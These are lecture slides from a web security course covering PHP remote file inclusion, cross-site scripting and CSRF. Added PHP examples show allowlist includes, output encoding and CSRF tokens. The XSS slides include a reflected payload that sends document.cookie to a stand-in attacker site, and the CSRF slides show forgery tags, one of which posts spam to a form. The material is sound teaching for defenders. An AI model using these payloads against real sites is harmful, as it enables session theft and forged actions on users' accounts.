![Page 1: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/1.jpg)
Cosc 4765
Server side Web security
![Page 2: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/2.jpg)
Web security issues
From Cenzic Vulnerability report 2014: https://info.cenzic.com/2013-Application-Security-Trends-Report.html
![Page 3: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/3.jpg)
• SQL Injections
– Discussed in another lecture
• Web Server Configuration and Web server versions
– Poorly configured systems.
• Allowing PHP remote file include
– The advertised version allows attackers to look up that version to find a vulnerability in the web server.
![Page 4: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/4.jpg)
PHP Remote File Include
• By default, PHP allows file functions to access resources on the Internet using a feature called "allow_url_fopen".
• When PHP scripts allow user input to influence file names, remote file inclusion can be the result.
![Page 5: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/5.jpg)
PHP Remote File Include
• This attack allows (but is not limited to):
– Remote code execution
– Remote root kit installation
– On Windows, complete system compromise may be possible through the use of PHP’s SMB file wrappers
• Fixes:
– Input validation and sanitizing
– Config allow_url_fopen off
• This will break apps that rely on this feature, but protects against a very active exploit vector.
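The two fixes on this slide, shown side by side on a page-loading script. This is an added example, not code from the slides: the script, the `load_page_*` and `resolve_page` function names and the `pages/` directory are all hypothetical. The vulnerable form lets the `page` parameter become part of the included file name; the hardened form only ever uses the parameter as a key into a fixed allowlist, so no request value reaches `include` as a path or URL.

```php
<?php
// Added example (not from the slides). Hypothetical page-loading script.

// Vulnerable form: the request parameter is concatenated into the include
// target. With allow_url_fopen / allow_url_include on, PHP's file functions
// accept URLs here, so whoever controls ?page= controls which code runs.
function load_page_vulnerable(string $page): void
{
    include $page . '.php';   // ?page=home -> home.php, but any path or URL also works
}

// Hardened form: a fixed allowlist of pages keyed by the only values we accept.
// The request value is looked up, never concatenated into a path.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;   // unknown key -> null, nothing is included
}

function load_page_hardened(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Entry point: default to 'home' when the parameter is missing.
load_page_hardened($_GET['page'] ?? 'home');
```

The allowlist makes the code correct regardless of the php.ini setting; the configuration change is the second layer. In php.ini, `allow_url_fopen = Off` is the setting named on the slide, and `allow_url_include = Off` (a separate directive in current PHP) specifically disables URLs in `include`/`require`, so both belong in a hardened configuration.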
![Page 6: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/6.jpg)
• Authentication and Authorization errors
– Generally the ability to avoid a required login screen
• Or hack another login, normally via XSS or CSRF
• Information leakage.
– Data is displayed that is not necessary.
• Example: UW used to show your SSN on every page of wyoweb.
– Or displayed on “not protected” pages.
• Email address, phone number, etc.
• Why is this important?
![Page 7: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/7.jpg)
XSS
• Works by the trust a user has for the site.
– Broadly defined as tricking web pages into displaying web surfer supplied data capable of altering the page for the viewer.
• Most dynamic web pages change to display info for a user, but XSS changes the pages to get information from the viewer, normally cookies and other data.
![Page 8: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/8.jpg)
Some necessary knowledge
• A basic understanding of URL structure
• An understanding of html, JavaScript
• Some understanding of html encoding, http request methods
• web application technologies like ASP, php, etc.
![Page 9: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/9.jpg)
What can XSS do?
• Cookie theft and Account Hijacking
– Since XSS executes arbitrary web code in the client's browser.
– Many cookies for older web applications hold all the information needed to log in to an account (“Remember this computer”)
• verification info on the client side, state, and/or credentials
– Allows for identity theft, accessing confidential resources, pay content, even denial of account services.
![Page 10: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/10.jpg)
What can XSS do? (2)
• User Tracking / Statistics
– Able to gain information on a site's users
– Able to monitor their clicks through the vulnerable site.
– May be able to link a user's email address to clicks and interests
• good for spammers!
![Page 11: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/11.jpg)
What can XSS do? (3)
• Browser / User exploitation
– Possible Examples
• Use the credentials of a site to do what I want
– Like using the Microsoft site.
– If there is an XSS hole in their site to run my malware.
» Many people would press OK to run code from Microsoft.
• High distribution rate and target audience
• Don’t exploit the site, just steal the users from the site and redirect them to another.
• Force users into actions on another site on my behalf but remove me from the evidence.
![Page 12: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/12.jpg)
What can XSS do? (4)
• Misinformation
– dissemination of disinformation
• Since we can possibly rewrite content on web pages
– And of course… SPAM and scams.
![Page 13: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/13.jpg)
How to avoid XSS
• Most of it is avoidable, just like SQL injection and buffer overflow.
– but like these, it’s sometimes easier to miss
– especially on large and complex web sites.
– One big one: turn off error messages on production web sites.
• How?
– Just like Buffer Overflow and SQL injection
– Proper filtering on ALL user input data.
![Page 14: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/14.jpg)
Example
• Typical script called welcome.cgi
– GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
– Host: www.vulnerable.site
• Response
– <html> <title>Welcome!</title>
– Hi Joe Hacker
– <BR> Welcome to our system…
– </html>
![Page 15: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/15.jpg)
Example abused
• http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
• Once the link is clicked, the response is:
– <HTML> <Title>Welcome!</Title>
– Hi <script>alert(document.cookie)</script>
– <BR> Welcome to our system ...
– </HTML>
• Which is executed by the browser
![Page 16: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/16.jpg)
Example abused (2)
• Better example:
– http://www.vulnerable.site/welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script>
• Returns to user
– <script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>
• Opens a web page on the attacker's site that receives the cookie info for the vulnerable website.
![Page 17: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/17.jpg)
Preventing XSS
• Don’t just filter dangerous characters
• Filter out everything that is not necessary
• Make sure there is one central function to sanitize everything.
– So when it is added to, everything gets it.
![Page 18: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/18.jpg)
Filter Examples
• Perl
– Allow A through Z in any case, zero through nine, space, period and dash. Remove everything else.
– $var =~ s/[^a-z0-9 \-.]//ig;
![Page 19: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/19.jpg)
Filter Examples (2)
• PHP
– Use the strip_tags or htmlentities functions
• echo htmlentities($name);
– Or use substitution again.
• echo preg_replace('/[^a-z0-9 .\-]/i', '', $name);
![Page 20: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/20.jpg)
Demo
• In class Demo of how XSS works
![Page 21: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/21.jpg)
Filter output data
• Not the html, but the data.
• Similar to filtering input, except that you filter the characters that are written out to the client.
– May cause problems with output for dynamic web pages.
• Example: a <table> tag in the data would be written out as literal text rather than rendering a table.
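The welcome.cgi example, the "one central function" rule, the PHP filter examples and the output-filtering slide all come together in one script. This is an added example, not code from the slides: the `welcome.cgi` page is rewritten in PHP, and `h()`, `clean_name()`, `welcome_vulnerable()` and `welcome_safe()` are hypothetical names. It shows the page echoing the name raw (the bug), the same page with every data value routed through a single output-encoding function, and the allowlist substitution from the filter slide; the input is the constructed payload from the "Example abused" slide.

```php
<?php
// Added example (not from the slides): welcome.cgi in PHP, vulnerable and fixed.

// Central output-encoding function. Every untrusted value passes through here
// before it is written into HTML. ENT_QUOTES also encodes ' and " so the
// result is safe inside attribute values, not only in element text.
function h(string $s): string
{
    return htmlentities($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Allowlist filter from the "Filter Examples" slides: keep letters, digits,
// space, period and dash; strip everything else.
function clean_name(string $s): string
{
    return preg_replace('/[^a-z0-9 .\-]/i', '', $s);
}

// The bug: the query parameter is written into the page unchanged, so any
// markup in it becomes part of the page the browser executes.
function welcome_vulnerable(string $name): string
{
    return "<html><title>Welcome!</title>Hi $name<br>Welcome to our system...</html>";
}

// The fix: only the data goes through h(); the page's own markup (<br>, <title>)
// is written as-is. Encoding the template too is what breaks dynamic pages,
// which is the caveat on the "Filter output data" slide.
function welcome_safe(string $name): string
{
    return "<html><title>Welcome!</title>Hi " . h($name) . "<br>Welcome to our system...</html>";
}

// Constructed input: the payload shown on the "Example abused" slide.
$payload = $_GET['name'] ?? '<script>alert(document.cookie)</script>';

echo welcome_vulnerable($payload), "\n";   // script tag reaches the browser intact
echo welcome_safe($payload), "\n";         // < and > become &lt; and &gt;; shown as text
echo clean_name($payload), "\n";           // only letters, digits, space, . and - survive
```

Run it from the command line (`php welcome.php`) to compare the three outputs, or serve it and request `?name=` yourself. The encoded version shows the payload as text; the allowlisted version discards the angle brackets and parentheses entirely, which is stricter but, as the slides note, may reject names you wanted to keep. Both approaches share the same weakness if a second code path writes `$name` to the page without calling `h()`, which is why the central function has to be the only way data reaches the output.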
![Page 22: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/22.jpg)
Possible Sources of Malicious Data
• Query String
• Cookies
• Posted data
• URLs and pieces of URLs, such as PATH_INFO
• Data retrieved from users that is persisted in some fashion such as in a database
![Page 23: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/23.jpg)
Cross-site request forgeries (CSRF)
• Works by exploiting the trust that a site has for the user.
– Works by specific URLs allowing specific actions to be performed when requested
– Same idea as one-click purchase
• http://site/stocks?buy=100&stock=ebay
– Task performed by the user who is already logged into the site.
• The browser makes the request, without the user's knowledge.
• Can be done with XSS.
![Page 24: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/24.jpg)
Example CSRF
• HTML Methods
– IMG SRC <img src="http://host/?command">
– SCRIPT SRC <script src="http://host/?command">
– IFRAME SRC <iframe src="http://host/?command">
• JavaScript Methods
– <script> var foo = new Image(); foo.src = "http://host/?command"; </script>
• Example code:
– <img src="http://example.com/add_to_db.php?name=cheap%20rolex&[email protected]&comment=mortgage%20help&optin=yes" width="1" height="1">
![Page 25: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/25.jpg)
Major hacks with CSRF
• A vulnerability in GMail was discovered in January 2007 which allowed an attacker to steal a GMail user's contact list.
• A different issue was discovered in Netflix which allowed an attacker to change the name and address on the account, as well as add movies to the rental queue etc...
![Page 26: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/26.jpg)
Fixes for CSRF
• A user should always have to log in.
– No “Remember Me” or something of that sort, which is based on a cookie login.
– Short session periods (maybe 5 minutes) can also reduce the odds of successful attacks.
• Adding a session token to each request
– But XSS can get around this by sniffing the session token.
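The "session token on each request" fix, applied to the stock-purchase action from the CSRF slide. This is an added example, not code from the slides: the `/stocks` form, the `csrf_token()` and `csrf_check()` names and the `csrf_token` session key are hypothetical. A random token is generated once per session and embedded in the form; the server refuses any POST that does not carry the matching value. An `<img src>` or a form on another site can still cause the browser to send the user's cookies, but it cannot know the token, so the request is rejected.

```php
<?php
// Added example (not from the slides): per-session CSRF token on a state-changing action.
session_start();

// Create the token on first use and keep it for the life of the session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));   // 256 bits from the CSPRNG
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted value with the session's token. hash_equals() is a
// constant-time comparison; a missing session token always fails.
function csrf_check(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // Token verified: the request came from a form this server rendered for
    // this session, so the action may proceed with the logged-in user's rights.
    $stock = preg_replace('/[^a-z0-9.\-]/i', '', $_POST['stock'] ?? '');
    $qty   = (int) ($_POST['buy'] ?? 0);
    echo 'Order accepted: buy ' . $qty . ' of ' . htmlentities($stock, ENT_QUOTES, 'UTF-8');
    exit;
}

// GET: render the form with the token in a hidden field (encoded for HTML).
$token = htmlentities(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="/stocks">
  <input type="hidden" name="csrf_token" value="$token">
  <input name="stock" value="ebay"> <input name="buy" value="100">
  <button type="submit">Buy</button>
</form>
HTML;
```

Two design points follow from the slides. First, the action is a POST with the token in the body rather than the GET URL shown on the CSRF slide, so it cannot be triggered by an `<img>` or `<script>` tag at all. Second, the token is only as secret as the page it sits on: the slide's caveat that XSS can read the token still applies, so the output-encoding fixes from the XSS slides are a prerequisite, not an alternative.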
![Page 27: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/27.jpg)
Tools
• The list is older, maybe still useful
– http://projects.webappsec.org/w/page/13246988/Web%20Application%20Security%20Scanner%20List
– From http://samate.nist.gov/index.php/Web_Application_Vulnerability_Scanners.html#Web_Applications_Issues
• Source code scanners
– http://samate.nist.gov/index.php/Source_Code_Security_Analyzers.html
![Page 28: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/28.jpg)
References
• http://coding.smashingmagazine.com/2010/01/14/web-security-primer-are-you-part-of-the-problem/
• http://www.cert.org/advisories/CA-2000-02.html
• HOWTO: Prevent Cross-Site Scripting Security Issues http://www.megasecurity.org/Info/CSS_prevent.html
• Cross Site Scripting Scanning ("XSSS") http://www.sven.de/xsss/
• http://en.wikipedia.org/wiki/Cross_site_scripting
• http://ha.ckers.org/xss.html
• http://www.sans.org/
• http://www.cgisecurity.com/articles/csrf-faq.shtml
![Page 29: Cosc 4765](https://reader036.vdocument.in/reader036/viewer/2022062806/56814ef2550346895dbc8132/html5/thumbnails/29.jpg)
Q&A